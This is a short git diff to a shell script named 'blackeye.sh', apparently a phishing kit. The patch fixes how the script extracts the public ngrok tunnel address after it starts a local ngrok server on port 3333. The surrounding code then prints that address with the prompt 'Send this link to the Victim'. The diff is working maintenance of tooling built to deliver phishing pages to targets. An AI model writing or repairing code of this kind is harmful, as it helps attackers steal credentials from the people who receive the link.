diff --git a/blackeye.sh b/blackeye.sh index 50b1eec..527166a 100755 --- a/blackeye.sh +++ b/blackeye.sh @@ -433,7 +433,7 @@ printf "\e[1;92m[\e[0m*\e[1;92m] Starting ngrok server...\n" ./ngrok http 3333 > /dev/null 2>&1 & sleep 10 -link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io") +link=$( curl -S -n http://127.0.0.1:4040/api/tunnels | grep -oE "https:\/\/[a-z0-9\-]*\.ngrok\.io") printf "\e[1;92m[\e[0m*\e[1;92m] Send this link to the Victim:\e[0m\e[1;77m %s\e[0m\n" $link checkfound }